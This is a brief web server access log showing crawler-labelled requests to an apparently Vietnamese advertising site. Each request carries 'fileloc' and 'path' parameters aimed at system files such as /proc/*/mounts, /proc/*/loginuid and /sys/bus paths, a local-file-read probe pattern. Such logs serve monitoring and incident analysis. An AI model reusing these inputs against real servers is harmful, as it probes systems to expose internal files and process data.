51.77.43.178 - - [10/Nov/2025:01:09:02 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/oom_score&path=//proc/661 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:09:03 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/mounts&path=//proc/689 HTTP/1.1" 200 3350 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
107.20.224.184 - - [10/Nov/2025:01:09:03 +0000] "GET /our-works/tvc-relax-gaba/?path=//sys/bus/cec/devices HTTP/1.1" 200 2673 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:09:03 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/numa_maps&path=//proc/664 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:09:04 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/mounts&path=//proc/661 HTTP/1.1" 200 3350 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:09:04 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/loginuid&path=//proc/695 HTTP/1.1" 200 2616 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
